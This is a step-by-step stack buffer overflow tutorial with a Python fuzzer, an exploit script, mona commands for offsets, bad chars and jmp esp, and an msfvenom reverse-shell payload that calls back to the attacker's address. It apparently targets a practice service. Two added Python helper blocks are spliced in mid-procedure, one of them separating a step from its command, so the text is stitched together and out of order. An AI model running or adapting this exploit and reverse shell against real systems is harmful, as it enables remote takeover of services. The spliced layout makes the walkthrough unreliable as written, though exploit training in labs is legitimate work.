Steps To Exploit Buffer Overflow

etCyberGuy
2 min read · Apr 20, 2022
  • First, install Immunity Debugger on the Windows host that runs the target service.
  • Load the executable binary into Immunity Debugger.
  • Configure mona's working folder with the following command (%p expands to the name of the debugged process):
!mona config -set workingfolder c:\mona\%p
  • Start the loaded service (Run, F9) and move on to enumeration.

Enumeration

  • Create a fuzzer script that sends progressively longer strings to find the length at which the service crashes.
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.4.64"  # change this
port = 9999  # change this
prefix = ""  # command the service expects before the data, if any (empty for this service)
timeout = 5

string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # a timeout or reset here means the service went down
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"  # grow the buffer by 100 bytes per round
    time.sleep(1)
  • Run the fuzzer and note the length at which the service crashes (watch the debugger for the access violation):
python3 fuzzer.py

Exploitation

  • The goal is to crash the application and control the EIP register.
  • Generate a cyclic pattern: take the crash length reported by fuzzer.py, add some extra bytes so the pattern is certain to cover EIP, and create a pattern of that length:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
  • Put the generated pattern into the payload variable of your exploit, restart oscp in the debugger, and run the exploit.
  • Create a Python script (exploit.py) with the following content:
import socket

ip = "10.10.4.64"  # change this
port = 9999  # change this

offset = 0
overflow = b"A" * offset  # filler up to the saved return address
retn = b""                # 4-byte return address (little-endian) goes here
padding = b""             # NOP sled before the shellcode
payload = b""             # pattern, bad-char string or shellcode, depending on the step
postfix = b""

buffer = overflow + retn + padding + payload + postfix
print(buffer)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.recv(1024)  # banner
    s.recv(1024)  # prompt
    s.send(buffer + b"\r\n")  # buffer is already bytes, so append bytes
    print("Done!")
except:
    print("Could not connect.")
finally:
    s.close()
  • Now run it:
python3 exploit.py
  • In Immunity Debugger, after oscp crashes on the pattern, find the offset at which the pattern overwrote EIP with the following (replace len with the length of the pattern you generated):
!mona findmsp -distance len
  • Update your exploit: set offset to the value mona reported, clear payload back to an empty byte string and set retn to b"BBBB", then run the script; EIP should now read 42424242, confirming you control it.
  • Generate a byte array with mona, excluding the null byte (\x00) by default:
!mona bytearray -b "\x00"
  • Generate a string of all byte values \x01 to \xff, matching that byte array, and put it in the payload variable of your script.
  • Restart oscp, run the exploit script, and note the ESP address shown in the debugger after the crash; then compare the byte array with what is in memory at that address:
!mona compare -f C:\mona\oscp\bytearray.bin -a <address>
  • Remove the reported bad chars from your payload, restart oscp and run the exploit again, repeating until mona reports the byte array unmodified. Note that not every byte mona reports is itself bad: a bad char can corrupt the byte that follows it, so remove them one at a time and re-check.
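What the bytearray and compare steps above do, as an added example that is not part of the original post: build_bytearray() produces the \x01..\xff probe that !mona bytearray writes, as_python_literal() renders it for pasting into the payload variable, first_divergence() does the job of !mona compare, and find_bad_chars() runs the exclude-and-retest loop against two constructed stand-in services (one that truncates at a newline, one that rewrites \r into \r\n) to show the caveat that a reported byte may be innocent when the byte before it corrupted it. All function names and the two simulated services are assumptions for illustration.

```python
def build_bytearray(excluded=(0x00,)):
    r"""Probe string \x01..\xff with the excluded values removed: the same
    content that `!mona bytearray -b "\x00"` writes to bytearray.bin."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def as_python_literal(data):
    r"""Render bytes as a b"\xNN..." literal to paste into the payload variable."""
    return 'b"' + "".join("\\x{:02x}".format(b) for b in data) + '"'


def first_divergence(sent, seen):
    """Job of `!mona compare`: return (index, sent_byte, seen_byte) of the first
    position where memory differs from what was sent, or None if intact.
    seen_byte is None when the copy in memory was cut short."""
    for i, (a, b) in enumerate(zip(sent, seen)):
        if a != b:
            return (i, a, b)
    if len(seen) < len(sent):
        return (len(seen), sent[len(seen)], None)
    return None


def find_bad_chars(service, excluded=(0x00,), max_rounds=20):
    """The iterative procedure from the text: send the probe, compare, exclude,
    repeat until the probe survives intact. If the divergence stays at the same
    position after excluding the flagged byte, that byte was innocent and the
    byte sent just before it is the real culprit (the caveat in the text)."""
    excluded = set(excluded)
    last = None  # (divergence index, byte excluded in that round)
    for _ in range(max_rounds):
        probe = build_bytearray(excluded)
        d = first_divergence(probe, service(probe))
        if d is None:
            return sorted(excluded)
        i, flagged, _seen = d
        if last is not None and last[0] == i and i > 0:
            excluded.discard(last[1])   # un-exclude the innocent byte
            culprit = probe[i - 1]      # blame the one sent before it
        else:
            culprit = flagged
        excluded.add(culprit)
        last = (i, culprit)
    raise RuntimeError("bad-char search did not converge")


# Constructed stand-ins for the service under test (assumptions, not real behaviour).
def truncating_service(data):
    """Stops copying input at the first newline (0x0a)."""
    return data.split(b"\n", 1)[0]


def crlf_service(data):
    """Rewrites 0x0d into 0x0d 0x0a, so the byte after every 0x0d is displaced
    and looks bad to a naive comparison even though 0x0d is the real problem."""
    return data.replace(b"\r", b"\r\n")


if __name__ == "__main__":
    probe = build_bytearray()
    print(as_python_literal(probe)[:40], "...")
    print(first_divergence(probe, truncating_service(probe)))  # (9, 10, None)
    print(find_bad_chars(truncating_service))  # [0, 10]
    print(find_bad_chars(crlf_service))        # [0, 13]: 0x0d, not the 0x0e flagged first
```

Against the crlf stand-in the first comparison flags 0x0e, exactly the false positive the text warns about; excluding it moves nothing, so the loop backs out and excludes 0x0d instead. This is why the text says to remove reported bytes one at a time and re-check rather than dropping everything mona lists in one go.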
  • Find a jump point. The command below lists all jmp esp instructions whose addresses contain none of the bad chars given to -cpb (use your full bad-char list in place of the placeholder):
!mona jmp -r esp -cpb "\x00<other bad chars>"
  • Choose an address and set retn in your exploit to that address written in reverse byte order (little-endian).
  • Generate a payload with msfvenom, encoding around the same bad chars, and assign it to the payload variable of your exploit:
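The pattern, offset and reversed-address steps above, as an added example (not the post's code; all function names and the sample addresses 0x11223344 and 0x11220044 are constructed for illustration): pattern_create() builds the same Aa0Aa1... cyclic pattern as pattern_create.rb, pattern_offset() recovers the offset from the EIP value the debugger shows (the equivalent of !mona findmsp), pack_return_address() writes the chosen address in little-endian order, and address_is_clean() performs the bad-char check that -cpb applies to candidate jmp esp addresses.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

PATTERN_PERIOD = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...), the same scheme as
    pattern_create.rb -l <length>. Every 4-byte window is unique within one period."""
    if length > PATTERN_PERIOD:
        raise ValueError("length exceeds the unique pattern period")
    out = []
    total = 0
    for u, l, d in product(ascii_uppercase, ascii_lowercase, digits):
        out.append(u + l + d)
        total += 3
        if total >= length:
            break
    return "".join(out)[:length].encode("ascii")


def pattern_offset(eip_hex, length):
    """Given the EIP value shown in the debugger after the crash (e.g. '41356141'),
    reverse it into the 4 pattern bytes (x86 stores the register little-endian)
    and return where they sit in the pattern, like pattern_offset.rb or
    `!mona findmsp -distance <length>`."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern: EIP is not pattern-controlled")
    return idx


def pack_return_address(addr):
    """The 'reversed address' step: emit the chosen jmp esp address in the byte
    order the CPU reads it back in (little-endian)."""
    return struct.pack("<I", addr)


def address_is_clean(addr, bad_chars):
    """The check `!mona jmp -cpb` performs: reject an address whose encoding
    contains any bad char, since the service would mangle it on the way in."""
    return not any(b in bad_chars for b in pack_return_address(addr))


if __name__ == "__main__":
    # Constructed values: the EIP below is what the debugger would show if the
    # pattern bytes at offset 15 ("Aa5A") overwrote the saved return address.
    print(pattern_create(600)[:30])
    print(pattern_offset("41356141", 600))             # 15
    print(pack_return_address(0x11223344))             # b'D3"\x11'
    print(address_is_clean(0x11223344, {0x00}))        # True
    print(address_is_clean(0x11220044, {0x00}))        # False: contains \x00
```

The reversal in pattern_offset() and pack_return_address() is the same little-endian fact seen from both sides: the debugger shows EIP as a number, so the four pattern characters appear reversed, and the address you send must be reversed for the same reason.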
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
  • Copy the generated shellcode into the payload variable.
  • Set padding to a run of NOPs (\x90) to leave some space between the return address and the shellcode:
padding = b"\x90" * 16
  • Run the exploit:
python3 exploit.py
